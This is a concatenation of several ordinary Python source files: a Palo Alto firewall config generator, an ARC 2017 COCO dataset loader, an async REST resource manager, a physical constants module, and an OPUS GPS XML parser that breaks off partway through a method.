if ("icmp" not in term.protocol and "icmpv6" not in term.protocol):
# the protocol is not ICMP or ICMPv6
break
if icmp_version == "icmp" and "ip4-ip4" not in flows:
# skip if there is no ip4 to ipv4 communication
continue
if icmp_version == "icmpv6" and "ip6-ip6" not in flows:
# skip if there is no ip4 to ipv4 communication
continue
if icmp_version == "icmp":
if filter_type == "inet6":
continue
if not term.icmp_type:
term.pan_application.append("icmp")
continue
icmp_type_keyword = "ident-by-icmp-type"
# The risk level 4 is the default PANOS' risk level for ICMP.
risk_level = 4
else:
if filter_type == "inet":
continue
if not term.icmp_type:
term.pan_application.append("ipv6-icmp")
continue
icmp_type_keyword = "ident-by-icmp6-type"
# The risk level 2 is the default PANOS' risk level for ICMPv6.
risk_level = 2
# The term contains ICMP types
for term_icmp_type_name in term.icmp_type:
if icmp_version == "icmp":
icmp_app_name = "icmp-%s" % term_icmp_type_name
if term_icmp_type_name not in policy.Term.ICMP_TYPE[4]:
raise PaloAltoFWBadIcmpTypeError(
"term with bad icmp type: %s, icmp_type: %s" %
(term.name, term_icmp_type_name))
term_icmp_type = policy.Term.ICMP_TYPE[4][term_icmp_type_name]
else:
icmp_app_name = "icmp6-%s" % term_icmp_type_name
if term_icmp_type_name not in policy.Term.ICMP_TYPE[6]:
raise PaloAltoFWBadIcmpTypeError(
"term with bad icmp type: %s, icmp_type: %s" %
(term.name, term_icmp_type_name))
term_icmp_type = policy.Term.ICMP_TYPE[6][term_icmp_type_name]
if icmp_app_name in self.application_refs:
# the custom icmp application already exists
continue
app_entry = {
"category": "networking",
"subcategory": "ip-protocol",
"technology": "network-protocol",
"description": icmp_app_name,
"default": {
icmp_type_keyword: "%d" % term_icmp_type,
},
"risk": "%d" % risk_level,
}
self.application_refs[icmp_app_name] = app_entry
self.applications.append(icmp_app_name)
if icmp_app_name not in term.pan_application:
term.pan_application.append(icmp_app_name)
# Filter out unsupported protocols
for proto_name in term.protocol:
if proto_name in self._SUPPORTED_PROTO_NAMES:
continue
raise PaloAltoFWUnsupportedProtocolError(
"protocol %s is not supported" % proto_name)
# Create Term object with the term, address family, and header
# parameters, e.g. to/from zone, and add it to a list of
# terms that would form a rule.
new_term = Term(term, filter_type, filter_options)
new_terms.append(new_term)
# Create a ruleset. It contains the rules for the terms defined under
# a single header on a particular platform.
ruleset = {}
for term in new_terms:
current_rule = Rule(self.from_zone, self.to_zone, term)
ruleset[term.term.name] = current_rule.options
self.pafw_policies.append((header, ruleset, filter_options))
  def _BuildAddressBook(self, zone, address):
    """Create the address book configuration entries.

    Args:
      zone: the zone these objects will reside in
      address: a naming library address object
    """
    if zone not in self.addressbook:
      self.addressbook[zone] = collections.OrderedDict()
    if address.parent_token not in self.addressbook[zone]:
      self.addressbook[zone][address.parent_token] = []
    name = address.parent_token
    # Deduplicate: entries are (address, unique_name) tuples; skip if this
    # exact address string was already recorded under the token.
    for ip in self.addressbook[zone][name]:
      if str(address) == str(ip[0]):
        return
    # Unique names are "<token>_<counter>", counter being the current
    # number of entries; _SortAddressBookNumCheck relies on this format.
    counter = len(self.addressbook[zone][address.parent_token])
    name = "%s_%s" % (name, str(counter))
    self.addressbook[zone][address.parent_token].append((address, name))
def _SortAddressBookNumCheck(self, item):
"""Used to give a natural order to the list of acl entries.
Args:
item: string of the address book entry name
Returns:
returns the characters and number
"""
item_list = item.split("_")
num = item_list.pop(-1)
if isinstance(item_list[-1], int):
set_number = item_list.pop(-1)
num = int(set_number) * 1000 + int(num)
alpha = "_".join(item_list)
if num:
return (alpha, int(num))
return (alpha, 0)
def _BuildPort(self, ports):
"""Transform specified ports into list and ranges.
Args:
ports: a policy terms list of ports
Returns:
port_list: list of ports and port ranges
"""
port_list = []
for i in ports:
if i[0] == i[1]:
port_list.append(str(i[0]))
else:
port_list.append("%s-%s" % (str(i[0]), str(i[1])))
return port_list
  def __str__(self):
    """Render the output of the PaloAltoFirewall policy into config.

    Builds an lxml tree (config/devices/vsys) holding custom applications,
    services, security rules, tags and the address book, then returns it
    pretty-printed as an XML string. Also stores the root element on
    self.config.
    """
    # INITIAL CONFIG
    config = etree.Element("config", {"version": "8.1.0",
                                      "urldb": "paloaltonetworks"})
    devices = etree.SubElement(config, "devices")
    device_entry = etree.SubElement(devices, "entry",
                                    {"name": "localhost.localdomain"})
    vsys = etree.SubElement(device_entry, "vsys")
    vsys_entry = etree.SubElement(vsys, "entry", {"name": "vsys1"})
    # APPLICATION: emit only the custom applications registered in
    # application_refs (e.g. ICMP-type apps built by _TranslatePolicy).
    app_entries = etree.Element("application")
    for app_name in self.applications:
      if app_name not in self.application_refs:
        # this is not a custom application.
        continue
      app = self.application_refs[app_name]
      app_entry = etree.SubElement(app_entries, "entry", {"name": app_name})
      for k in self.application_refs[app_name]:
        if isinstance(app[k], (str)):
          etree.SubElement(app_entry, k).text = app[k]
        elif isinstance(app[k], (dict)):
          # Only the "default" sub-dict is rendered; it carries the
          # ident-by-icmp[6]-type properties.
          if k == "default":
            default_props = etree.SubElement(app_entry, "default")
          else:
            continue
          for prop in app[k]:
            if k == "default" and prop in [
                "ident-by-icmp-type", "ident-by-icmp6-type"
            ]:
              icmp_type_props = etree.SubElement(default_props, prop)
              etree.SubElement(icmp_type_props, "type").text = app[k][prop]
            else:
              pass
    vsys_entry.append(app_entries)
    # APPLICATION GROUPS
    etree.SubElement(vsys_entry, "application-group")
    # SERVICES: service_map keys are ((ports...), protocol) tuples; the
    # ports tuple is stringified and squeezed into a comma-separated list.
    vsys_entry.append(etree.Comment(" Services "))
    service = etree.SubElement(vsys_entry, "service")
    for k, v in Service.service_map.items():
      entry = etree.SubElement(service, "entry", {"name": v["name"]})
      proto0 = etree.SubElement(entry, "protocol")
      proto = etree.SubElement(proto0, k[1])
      port = etree.SubElement(proto, "port")
      tup = str(k[0])[1:-1]
      # Drop the trailing comma a 1-tuple repr leaves behind.
      if tup[-1] == ",":
        tup = tup[:-1]
      port.text = tup.replace("'", "").replace(", ", ",")
    # RULES
    vsys_entry.append(etree.Comment(" Rules "))
    rulebase = etree.SubElement(vsys_entry, "rulebase")
    security = etree.SubElement(rulebase, "security")
    rules = etree.SubElement(security, "rules")
    tag = etree.Element("tag")
    tag_num = 0
    # pytype: disable=key-error
    # pylint: disable=unused-variable
    for (header, pa_rules, filter_options) in self.pafw_policies:
      # Each header comment becomes a numbered tag attached to every rule
      # rendered from that header.
      tag_name = None
      if header.comment:
        comment = " ".join(header.comment).strip()
        if comment:
          tag_num += 1
          # max tag len 127, max zone len 31
          tag_name = self._TAG_NAME_FORMAT.format(
              from_zone=filter_options[1], to_zone=filter_options[3],
              num=tag_num)
          tag_entry = etree.SubElement(tag, "entry",
                                       {"name": tag_name})
          comments = etree.SubElement(tag_entry, "comments")
          comments.text = comment[:self._MAX_TAG_COMMENTS_LENGTH]
      for name, options in pa_rules.items():
        entry = etree.SubElement(rules, "entry", {"name": name})
        if options["description"]:
          descr = etree.SubElement(entry, "description")
          x = " ".join(options["description"])
          descr.text = x[:self._MAX_RULE_DESCRIPTION_LENGTH]
        to = etree.SubElement(entry, "to")
        for x in options["to_zone"]:
          member = etree.SubElement(to, "member")
          member.text = x
        from_ = etree.SubElement(entry, "from")
        for x in options["from_zone"]:
          member = etree.SubElement(from_, "member")
          member.text = x
        source = etree.SubElement(entry, "source")
        if not options["source"]:
          member = etree.SubElement(source, "member")
          member.text = "any"
        else:
          for x in options["source"]:
            member = etree.SubElement(source, "member")
            member.text = x
        dest = etree.SubElement(entry, "destination")
        if not options["destination"]:
          member = etree.SubElement(dest, "member")
          member.text = "any"
        else:
          for x in options["destination"]:
            member = etree.SubElement(dest, "member")
            member.text = x
        # service section of a policy rule.
        service = etree.SubElement(entry, "service")
        if not options["service"] and not options["application"]:
          member = etree.SubElement(service, "member")
          member.text = "any"
        elif not options["service"] and options["application"]:
          # Adds custom applications.
          member = etree.SubElement(service, "member")
          member.text = "application-default"
        else:
          # Adds services.
          for x in options["service"]:
            member = etree.SubElement(service, "member")
            member.text = x
        # ACTION
        action = etree.SubElement(entry, "action")
        action.text = Term.ACTIONS.get(str(options["action"]))
        # check whether the rule is interzone
        if list(set(options["from_zone"]).difference(options["to_zone"])):
          type_ = etree.SubElement(entry, "rule-type")
          type_.text = "interzone"
        elif not options["from_zone"] and not options["to_zone"]:
          type_ = etree.SubElement(entry, "rule-type")
          type_.text = "interzone"
        # APPLICATION
        app = etree.SubElement(entry, "application")
        if not options["application"]:
          member = etree.SubElement(app, "member")
          member.text = "any"
        else:
          for x in options["application"]:
            member = etree.SubElement(app, "member")
            member.text = x
        if tag_name is not None:
          rules_tag = etree.SubElement(entry, "tag")
          member = etree.SubElement(rules_tag, "member")
          member.text = tag_name
        # LOGGING: "disable" forces both flags off but does not suppress
        # an explicit log-start/log-end also present in the options.
        if options["logging"]:
          if "disable" in options["logging"]:
            log = etree.SubElement(entry, "log-start")
            log.text = "no"
            log = etree.SubElement(entry, "log-end")
            log.text = "no"
          if "log-start" in options["logging"]:
            log = etree.SubElement(entry, "log-start")
            log.text = "yes"
          if "log-end" in options["logging"]:
            log = etree.SubElement(entry, "log-end")
            log.text = "yes"
    # pytype: enable=key-error
    # ADDRESS
    address_book_names_dict = {}
    address_book_groups_dict = {}
    for zone in self.addressbook:
      # building individual addresses dictionary; on name collision keep
      # the existing entry if it is a supernet of the new address.
      groups = sorted(self.addressbook[zone])
      for group in groups:
        for address, name in self.addressbook[zone][group]:
          if name in address_book_names_dict:
            if address_book_names_dict[name].supernet_of(address):
              continue
          address_book_names_dict[name] = address
      # building individual address-group dictionary
      for nested_group in groups:
        group_names = []
        for address, name in self.addressbook[zone][nested_group]:
          group_names.append(name)
        address_book_groups_dict[nested_group] = group_names
    # sort address books and address sets
    address_book_groups_dict = collections.OrderedDict(
        sorted(address_book_groups_dict.items()))
    address_book_keys = sorted(
        list(address_book_names_dict.keys()), key=self._SortAddressBookNumCheck)
    vsys_entry.append(etree.Comment(" Address Groups "))
    addr_group = etree.SubElement(vsys_entry, "address-group")
    for group, address_list in address_book_groups_dict.items():
      entry = etree.SubElement(addr_group, "entry", {"name": group})
      static = etree.SubElement(entry, "static")
      for name in address_list:
        member = etree.SubElement(static, "member")
        member.text = name
    vsys_entry.append(etree.Comment(" Addresses "))
    addr = etree.SubElement(vsys_entry, "address")
    for name in address_book_keys:
      entry = etree.SubElement(addr, "entry", {"name": name})
      desc = etree.SubElement(entry, "description")
      desc.text = name
      ip = etree.SubElement(entry, "ip-netmask")
      ip.text = str(address_book_names_dict[name])
    vsys_entry.append(tag)
    self.config = config
    document = etree.tostring(config, encoding="UTF-8")
    dom = minidom.parseString(document.decode("UTF-8"))
    return dom.toprettyxml(indent=self.INDENT)
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pycocotools.coco as coco
from pycocotools.cocoeval import COCOeval
import numpy as np
import json
import os
import torch.utils.data as data
class ARC(data.Dataset):
  """COCO-format dataset for the ARC 2017 (Amazon Robotics Challenge) images.

  Provides annotation loading, COCO-style result conversion and bbox
  evaluation for a 40-class object set.
  """
  num_classes = 40
  default_resolution = [512, 512]
  # Per-channel normalization statistics (RGB), broadcastable over HxWx3.
  mean = np.array([0.36490161, 0.38790256, 0.42305998],
                  dtype=np.float32).reshape(1, 1, 3)
  std = np.array([0.20007855, 0.28563227, 0.31387719],
                 dtype=np.float32).reshape(1, 1, 3)

  def __init__(self, opt, split):
    """Load annotations for one split.

    Args:
      opt: options object; only opt.data_dir is read here.
      split: dataset split name, e.g. 'train', 'val' or 'test'.
    """
    super(ARC, self).__init__()
    self.data_dir = os.path.join(opt.data_dir, 'arc')
    self.img_dir = os.path.join(self.data_dir, '{}'.format(split))
    if split == 'test':
      # The test split evaluates against the validation annotations.
      # (The original applied a no-op .format(split) to this
      # placeholder-free path; removed.)
      self.annot_path = os.path.join(
        self.data_dir, 'annotations',
        'val_arc.json')
    else:
      self.annot_path = os.path.join(
        self.data_dir, 'annotations',
        '{}_arc.json').format(split)
    self.max_objs = 40
    self.class_name = [
      '__background__', 'Binder', 'Balloons', 'Baby_Wipes',
      'Toilet_Brush', 'Toothbrushes', 'Crayons', 'Salts', 'DVD',
      'Glue_Sticks', 'Eraser', 'Scissors', 'Green_Book', 'Socks',
      'Irish_Spring', 'Paper_Tape', 'Touch_Tissues', 'Knit_Gloves',
      'Laugh_Out_Loud_Jokes', 'Pencil_Cup', 'Mini_Marbles',
      'Neoprene_Weight', 'Wine_Glasses', 'Water_Bottle', 'Reynolds_Pie',
      'Reynolds_Wrap', 'Robots_Everywhere', 'Duct_Tape', 'Sponges',
      'Speed_Stick', 'Index_Cards', 'Ice_Cube_Tray', 'Table_Cover',
      'Measuring_Spoons', 'Bath_Sponge', 'Pencils', 'Mousetraps',
      'Face_Cloth', 'Tennis_Balls', 'Spray_Bottle', 'Flashlights']
    # COCO category ids (1-based) and their mapping to 0-based class
    # indices used by the network head.
    self._valid_ids = [
      1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
      11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
      21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
      31, 32, 33, 34, 35, 36, 37, 38, 39, 40]
    self.cat_ids = {v: i for i, v in enumerate(self._valid_ids)}
    # Deterministic per-class colors for visualization.
    self.voc_color = [(v // 32 * 64 + 64, (v // 8) % 4 * 64, v % 8 * 32) \
                      for v in range(1, self.num_classes + 1)]
    # Fixed RNG plus PCA eigen values/vectors for color augmentation.
    self._data_rng = np.random.RandomState(123)
    self._eig_val = np.array([0.2141788, 0.01817699, 0.00341571],
                             dtype=np.float32)
    self._eig_vec = np.array([
      [-0.58752847, -0.69563484, 0.41340352],
      [-0.5832747, 0.00994535, -0.81221408],
      [-0.56089297, 0.71832671, 0.41158938]
    ], dtype=np.float32)
    self.split = split
    self.opt = opt
    print('==> initializing arc 2017 {} data.'.format(split))
    self.coco = coco.COCO(self.annot_path)
    self.images = self.coco.getImgIds()
    self.num_samples = len(self.images)
    print('Loaded {} {} samples'.format(split, self.num_samples))

  def _to_float(self, x):
    """Round a number to two decimals and return it as float."""
    return float("{:.2f}".format(x))

  def convert_eval_format(self, all_bboxes):
    """Convert {image_id: {class_index: [bbox, ...]}} detections to the
    COCO results format.

    Boxes arrive as [x1, y1, x2, y2, score, (8 extreme points)] and are
    converted in place to [x, y, w, h]; class indices are 1-based and are
    mapped back to COCO category ids via _valid_ids.
    """
    detections = []
    for image_id in all_bboxes:
      for cls_ind in all_bboxes[image_id]:
        category_id = self._valid_ids[cls_ind - 1]
        for bbox in all_bboxes[image_id][cls_ind]:
          bbox[2] -= bbox[0]
          bbox[3] -= bbox[1]
          score = bbox[4]
          bbox_out = list(map(self._to_float, bbox[0:4]))
          detection = {
              "image_id": int(image_id),
              "category_id": int(category_id),
              "bbox": bbox_out,
              "score": float("{:.2f}".format(score))
          }
          if len(bbox) > 5:
            extreme_points = list(map(self._to_float, bbox[5:13]))
            detection["extreme_points"] = extreme_points
          detections.append(detection)
    return detections

  def __len__(self):
    """Number of images in the split."""
    return self.num_samples

  def save_results(self, results, save_dir):
    """Write detections to <save_dir>/results.json in COCO format."""
    json.dump(self.convert_eval_format(results),
              open('{}/results.json'.format(save_dir), 'w'))

  def run_eval(self, results, save_dir):
    """Save results and run the COCO bbox evaluation over them."""
    self.save_results(results, save_dir)
    coco_dets = self.coco.loadRes('{}/results.json'.format(save_dir))
    coco_eval = COCOeval(self.coco, coco_dets, "bbox")
    coco_eval.evaluate()
    coco_eval.accumulate()
    coco_eval.summarize()
|
<filename>src/restclientaio/manager.py
from collections import defaultdict
from typing import Any, AsyncIterable, AsyncIterator, Dict, Sequence, Type, \
TypeVar, cast
from weakref import WeakValueDictionary
from aiostream import stream
from .hydrator import Hydrator
from .request import Requester
from .resource import Resource, ResourceError
__all__ = ('ResourceManager',)
R = TypeVar('R', bound=Resource)
class ResourceManager:
    """Manages retrieval and saving of resource objects.

    Generally, this class should not be used directly -- use explicit
    `.Repository` for the wanted resource type instead.

    `ResourceManager` uses an identity map to avoid double-instantiating of
    resources if they have an id field.

    :param requester:
    :param hydrator:
    """

    def __init__(self, requester: Requester, hydrator: Hydrator) -> None:
        self._requester = requester
        self._hydrator = hydrator
        # Per-class identity map; weak values let resources that nothing
        # else references be garbage-collected instead of living here.
        self._identity_map = defaultdict(
            WeakValueDictionary,
        )  # type: Dict[Type[Resource], WeakValueDictionary[Any, Resource]]

    def _get_meta(
        self,
        cls: Type[R],
        action: str,
        overrides: Dict[str, Any] = {},
    ) -> Dict[str, Any]:
        """Get meta info for class and action, including overrides.

        Always returns a fresh dict. BUGFIX: the previous implementation
        called ``meta.update(overrides)`` on the dict stored on
        ``cls._Meta`` itself, so per-call overrides (and the id key set by
        :meth:`get`) leaked into the class definition and polluted every
        subsequent call; copying the class-level dict prevents that.
        """
        meta: Dict[str, Any] = {}
        if hasattr(cls, '_Meta'):
            meta = dict(getattr(cls._Meta, action, {}))
        meta.update(overrides)
        return meta

    def _get_id_attr(self, resource_class: Type[R]) -> str:
        """Get identifier attribute name, if any (defaults to ``'id'``)."""
        return str(getattr(getattr(resource_class, '_Meta', None), 'id', 'id'))

    def get_id(self, resource: R) -> Any:
        """Get identifier value, or `None`.

        :param resource:
        """
        idattr = self._get_id_attr(type(resource))
        return getattr(resource, idattr, None)

    def is_new(self, resource: R) -> Any:
        """Check if resource was created but not saved yet.

        :param resource:
        """
        return self.get_id(resource) is None

    def _track(self, resource: R) -> None:
        """Add resource to the identity map (no-op for unsaved resources)."""
        id = self.get_id(resource)  # noqa: B001
        if id is not None:
            self._identity_map[type(resource)][id] = resource

    def _get_or_instantiate(
        self,
        resource_class: Type[R],
        data: Dict[str, Any],
    ) -> R:
        """Return an object hydrated with `data`.

        If a matching object can be found in the identity map, use it,
        otherwise instatiate a new one.

        :param resource_class: Type of the resource.
        :param data:
        """
        if not isinstance(data, dict):
            raise ResourceError(f'Expected a dict, got {type(data)!r}')
        idattr = self._get_id_attr(resource_class)
        id = data.get(idattr)  # noqa: B001
        resource = cast(R, self._identity_map[resource_class].get(id))
        if resource is None:
            resource = self.new(resource_class)
        # Re-hydrate even a cached instance so fresh server data wins.
        self._hydrator.hydrate(resource, data)
        self._track(resource)
        return resource

    async def get(
        self,
        resource_class: Type[R],
        id: Any,
        meta: Dict[str, Any] = {},
    ) -> R:
        """Fetch a resource by id.

        :param resource_class: Type of the resource.
        :param id: Identifier value.
        :param meta: Additional info to pass to the `.Requester`
            (treated read-only).
        """
        idattr = self._get_id_attr(resource_class)
        meta = self._get_meta(resource_class, 'get', meta)
        meta[idattr] = id
        meta['uri'] = meta['uri'].format(**{idattr: id or ''})
        response = await self._requester.get(meta)
        return self._get_or_instantiate(resource_class, response)

    async def list(
        self,
        resource_class: Type[R],
        meta: Dict[str, Any] = {},
    ) -> AsyncIterator[R]:
        """Fetch a list of resources.

        :param resource_class: Type of the resource.
        :param meta: Additional info to pass to the `.Requester` (like
            filters, etc.); treated read-only.
        """
        meta = self._get_meta(resource_class, 'list', meta)
        response = await self._requester.list(meta)
        if not isinstance(response, (Sequence, AsyncIterable)):
            raise ResourceError(
                f'Expected an iterable, got {type(response)!r}',
            )
        async with stream.iterate(response).stream() as s:
            async for data in s:
                yield self._get_or_instantiate(resource_class, data)

    def new(
        self,
        resource_class: Type[R],
    ) -> R:
        """Create a new instance, but don't save it.

        :param resource_class: Type of the resource.
        """
        resource = resource_class()
        self._hydrator.hydrate(resource, {}, force_clear=True)
        return resource

    async def save(self, resource: R, meta: Dict[str, Any] = {}) -> None:
        """Save resource.

        Creates the resource when it has no id yet, updates it otherwise;
        any dict returned by the server is hydrated back into the object.

        :param resource: The resource to save.
        :param meta: Additional info to pass to the `.Requester`
            (treated read-only).
        """
        data = self._hydrator.dehydrate(resource)
        if self.is_new(resource):
            meta = self._get_meta(type(resource), 'create', meta)
            data = await self._requester.create(meta, data)
        else:
            meta = self._get_meta(type(resource), 'update', meta)
            data = await self._requester.update(meta, data)
        if data and isinstance(data, dict):
            self._hydrator.hydrate(resource, data)
        self._track(resource)
|
<reponame>julemai/EEE-DA
#!/usr/bin/env python
from __future__ import print_function
import numpy as np
"""
Provides physical, mathematical, computational, and isotope constants.
Definition
----------
Pi = 3.141592653589793238462643383279502884197
...
Define the following constants:
Mathematical
Pi, Pi2, Pi3, TwoPi, Sqrt2
Physical
Gravity, T0, P0, T25, sigma, R, Na, REarth
Isotope
R13VPDB, R18VSMOW, R2VSMOW
Computational
tiny, huge, eps
Material
mmol_co2, mmol_h2o, mmol_air
density_quartz, cheat_quartz, cheat_water, cheat_air, latentheat_vaporization
Examples
--------
>>> from autostring import astr
>>> print(astr(Pi,3,pp=True))
3.142
>>> print(astr(Sqrt2,3,pp=True))
1.414
>>> print(astr(Gravity,3,pp=True))
9.810
>>> print(astr(T0,3,pp=True))
273.150
>>> print(astr(sigma,3,pp=True))
5.670e-08
>>> print(astr(R13VPDB,3,pp=True))
0.011
>>> print(astr(tiny,3,pp=True))
1.000e-06
>>> print(astr(REarth,3,pp=True))
6371000.000
>>> print(astr(mmol_h2o,3,pp=True))
18.015
>>> print(astr(mmol_air,3,pp=True))
28.964
>>> print(astr(density_quartz,3,pp=True))
2.650
>>> print(astr(cheat_quartz,3,pp=True))
800.000
>>> print(astr(cheat_water,3,pp=True))
4180.000
>>> print(astr(cheat_air,3,pp=True))
1010.000
>>> print(astr(latentheat_vaporization,3,pp=True))
2.450e+06
License
-------
This file is part of the JAMS Python package.
The JAMS Python package is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
The JAMS Python package is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with the JAMS Python package (cf. gpl.txt and lgpl.txt).
If not, see <http://www.gnu.org/licenses/>.
Copyright 2012-2014 <NAME>
History
-------
Written, MC, Jan 2012
Modified, MC, Feb 2013 - ported to Python 3
AP, Mar 2014 - dielectric constant H2O
AP, Sep 2014 - heat capacity of quartz, air and water, density of quartz
MC, Mar 2015 - Pi3=Pi/3
- rename heat capacities, molar masses, density of quartz
- moved dielH2O to own routine/file
- R13VPDB, R18VSMOW, R2VSMOW
MC, Nov 2016 - tiny->np.finfo(np.float).tiny, huge
"""
__all__ = ['Pi', 'Pi2', 'Pi3', 'TwoPi', 'Sqrt2',
           'Gravity', 'T0', 'P0', 'T25', 'sigma', 'R', 'Na', 'REarth',
           'mmol_co2', 'mmol_h2o', 'mmol_air',
           'density_quartz', 'cheat_quartz', 'cheat_water', 'cheat_air', 'latentheat_vaporization',
           'R13VPDB', 'R18VSMOW', 'R2VSMOW',
           'tiny', 'huge', 'eps']

# Mathematical
Pi    = 3.141592653589793238462643383279502884197    # Pi
Pi2   = 1.57079632679489661923132169163975144209858  # Pi/2
Pi3   = 1.0471975511965977461542144610931676280656   # Pi/3
TwoPi = 6.283185307179586476925286766559005768394    # 2*Pi
Sqrt2 = 1.41421356237309504880168872420969807856967  # Sqrt(2)

# Physical
Gravity = 9.81          # Standard average Earth's gravity [m^2 s^-1]
T0      = 273.15        # Celsius <-> Kelvin [K]
P0      = 101325.       # Standard pressure [Pa]
T25     = 298.15        # Standard ambient temperature [K]
sigma   = 5.67e-08      # Stefan-Boltzmann constant [W m^-2 K^-4]
R       = 8.3144621     # Ideal gas constant [J K^-1 mol^-1]
Na      = 6.02214129e23 # Avogadro number [mol^-1]
REarth  = 6371009.      # Radius of Earth [m]

# Material
mmol_co2 = 44.01        # Molar mass CO2 [g mol^-1]
mmol_h2o = 18.01528     # Molar mass water [g mol^-1]
mmol_air = 28.9644      # Molar mass of dry air [g mol^-1]
# from Campbell (1985) Soil Physics with BASIC, Elsevier Science
density_quartz = 2.65   # density of quartz [g cm^-3]
cheat_quartz   = 800.   # heat capacity of quartz [J kg^-1 K^-1]
cheat_water    = 4180.  # heat capacity of water [J kg^-1 K^-1]
cheat_air      = 1010.  # heat capacity of air [J kg^-1 K^-1]
latentheat_vaporization = 2.45e6  # latent heat of vaporization of water [J kg^-1]

# Isotope
R13VPDB  = 0.0112372    # 13C isotope ratio of VPDB
R18VSMOW = 2005.2e-6    # 18O isotope ratio of VSMOW
R2VSMOW  = 155.76e-6    # 2H isotope ratio of VSMOW

# Computational
# BUGFIX: np.float was a deprecated alias of the builtin float and was
# removed in NumPy 1.24; np.finfo(float) is equivalent on all versions.
eps  = np.finfo(float).eps   # smallest float such that 1.0 + eps != 1.0
huge = np.finfo(float).max   # largest representable double
tiny = np.finfo(float).tiny  # smallest positive normalized double

if __name__ == '__main__':
    import doctest
    doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
<filename>opusxml/core/opus.py
from __future__ import annotations
from collections import OrderedDict
import logging
from lxml import etree
import pint
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
class Solution:
    """Wrapper around an OPUS (Online Positioning User Service) XML result file.

    Parses the file once on construction and exposes accessors for solution
    metadata, mark metadata, data-quality figures and coordinates.  Distance
    values are returned as :mod:`pint` Quantities converted to the requested
    unit.
    """

    def __init__(self, filename: str):
        """Parse *filename* and keep the XML root element on the instance."""
        tree = etree.parse(filename)
        self.root = tree.getroot()

    def solution_info(self) -> OrderedDict:
        """
        Return a dict containing information about the solution.
        """
        info = OrderedDict([
            ('SID', self.root.get('SID')),
            ('SOLUTION_TIME', self.root.find('SOLUTION_TIME').text),
            ('OBSERVATION_TIME_START', self.root.find('OBSERVATION_TIME').get('START')),
            ('OBSERVATION_TIME_END', self.root.find('OBSERVATION_TIME').get('END')),
            ('CONTRIBUTOR_EMAIL', self.root.find('CONTRIBUTOR/EMAIL').text),
            ('RINEX_FILE', self.root.find('DATA_SOURCES/RINEX_FILE').text),
            ('EPHEMERIS_FILE_TYPE', self.root.find('DATA_SOURCES/EPHEMERIS_FILE').get('TYPE')),
            ('ANTENNA_NAME', self.root.find('DATA_SOURCES/ANTENNA/NAME').text),
            ('ANTENNA_ARP_HEIGHT', self.root.find('DATA_SOURCES/ANTENNA/ARP_HEIGHT').text),
            # Using a pint Quantity object here would make fiona unhappy, so
            # the ARP height is deliberately returned as plain text:
            #('ANTENNA_ARP_HEIGHT', self.root.find('DATA_SOURCES/ANTENNA/ARP_HEIGHT').text * ureg(self.root.find('DATA_SOURCES/ANTENNA/ARP_HEIGHT').get('UNIT'))),
        ])
        return info

    def mark_info(self) -> OrderedDict:
        """
        Return a dict containing information about the mark.

        Elements missing from MARK_METADATA are reported as the string 'None'.
        """
        info = OrderedDict()
        elems = ['PID', 'DESIGNATION', 'STAMPING', 'MONUMENT_TYPE', 'MONUMENT_DESC', 'STABILITY', 'DESCRIPTION']
        for e in elems:
            # find() returns None for a missing element, so accessing .text
            # raises AttributeError; catch exactly that (was a bare except).
            try:
                info[e] = self.root.find('MARK_METADATA/{}'.format(e)).text
            except AttributeError:
                info[e] = 'None'
        return info

    def data_quality(
        self,
        unit: str = 'm'
    ) -> tuple:
        """
        Extract the information from an OPUS XML file DATA_QUALITY element, and return it in the desired units.

        Parameters
        ----------
        unit (str) : distance units of the returned coordinate, valid values are 'm' or 'sft'.

        Returns
        -------
        accuracy (list of pint Quantity) : x,y,z coordinate accuracies (long, lat, el_height order).
        rms (pint Quantity) : the RMS value.
        used (list[int]) : observations [total, used].
        fixed (list[int]) : observation ambiguities [total, fixed].
        """
        quality = self.root.find('DATA_QUALITY')
        ureg = pint.UnitRegistry()
        # The UNIT attribute is shared by all three accuracy components, so
        # look it up once instead of three times.
        acc_unit = ureg(quality.find('ACCURACY').get('UNIT'))
        accuracy_lat = float(quality.find('ACCURACY/LAT').text) * acc_unit
        accuracy_long = float(quality.find('ACCURACY/LONG').text) * acc_unit
        accuracy_el_height = float(quality.find('ACCURACY/EL_HEIGHT').text) * acc_unit
        accuracy = [c.to(unit) for c in [accuracy_long, accuracy_lat, accuracy_el_height]]
        rms_src = float(quality.find('RMS').text) * ureg(quality.find('RMS').get('UNIT'))
        rms = rms_src.to(unit)
        used = [int(quality.find('PERCENT_OBS_USED').get('TOTAL')), int(quality.find('PERCENT_OBS_USED').get('USED'))]
        fixed = [int(quality.find('PERCENT_AMB_FIXED').get('TOTAL')), int(quality.find('PERCENT_AMB_FIXED').get('FIXED'))]
        return accuracy, rms, used, fixed

    def plane_coords(
        self,
        system: str = 'UTM',
        unit: str = 'm'
    ) -> list:
        """
        Extract the coordinate from an OPUS XML file PLANE_COORD_SPEC elements, and return it in the desired units and coordinate spec type.

        Parameters
        ----------
        system (str) : coordinate projection of the returned coordinate, valid values are 'UTM' or 'SPC'.
        unit (str) : distance units of the returned coordinate, valid values are 'm', 'ft' or 'sft'.

        Returns
        -------
        coords (list of pint Quantity) : easting, northing, ortho-height.

        Raises
        ------
        ValueError : if no PLANE_COORD_SPEC of the requested TYPE exists.
        """
        ureg = pint.UnitRegistry()
        # find() returns None instead of raising when there is no match, so
        # the previous try/except could never fire; test explicitly.
        pcs = self.root.find('PLANE_COORD_INFO/PLANE_COORD_SPEC[@TYPE="{}"]'.format(system))
        if pcs is None:
            logger.error("Unable to find a {} position".format(system))
            raise ValueError("Unable to find a {} position".format(system))
        e_src = float(pcs.find('EASTING').text) * ureg(pcs.find('EASTING').get('UNIT'))
        n_src = float(pcs.find('NORTHING').text) * ureg(pcs.find('NORTHING').get('UNIT'))
        h_src = float(self.root.find('ORTHO_HGT').text) * ureg(self.root.find('ORTHO_HGT').get('UNIT'))
        coords_src = [e_src, n_src, h_src]
        coords = [c.to(unit) for c in coords_src]
        return coords

    def position(
        self,
